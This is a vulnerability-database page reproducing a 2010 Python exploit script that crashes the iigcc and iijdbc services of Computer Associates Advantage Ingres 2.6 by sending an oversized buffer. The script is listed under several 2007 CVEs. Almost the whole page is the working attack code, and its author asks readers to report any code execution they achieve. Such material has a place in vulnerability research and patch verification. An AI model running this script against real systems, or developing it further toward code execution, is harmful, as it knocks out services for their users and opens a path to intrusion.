Recent Vulnerabilities Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-2007-3334 CVE-2007-3336 CVE-2007-3337 CVE-2007-3338

Publish Date: 17 Aug 2010

Author: fdisk

Source

                							

                # Exploit Title: Computer Associates Advantage Ingres 2.6 Denial of Service Vulnerabilities
# Date: 2010-08-14
# Author: fdisk
# Version: 2.6
# Tested on: Windows 2003 Server SP1 en
# CVE:  CVE-2007-3334 - CVE-2007-3336 - CVE-2007-3337 - CVE-2007-3338
# Notes: Fixed in the last version.
# please let me know if you are/were able to get code execution &lt;rr dot fdisk at gmail dot com&gt;
 
import socket
import sys
 
if len(sys.argv) != 4:
    print "Usage: ./CAAdvantageDoS.py &lt;Target IP&gt; &lt;Port&gt; &lt;Service&gt;"
    print "Vulnerable Services: iigcc, iijdbc"
    sys.exit(1)
 
host = sys.argv[1]
port = int(sys.argv[2])
service = sys.argv[3]
 
if service == "iigcc":
        payload = "\x41" * 2106
elif service == "iijdbc":
        payload = "\x41" * 1066
else:
        print "Vulnerable Services: iigcc, iijdbc"
        sys.exit(1)
 
payload += "\x42" * 4
 
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
print "Sending payload"
s.send(payload)
data = s.recv(1024)
s.close()
print 'Received', repr(data)
 
print service + " crashed"

<p>

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

Computer Associates Advantage Ingres 2.6 Denial Of Service

Vulmon Search

About

Products

Connect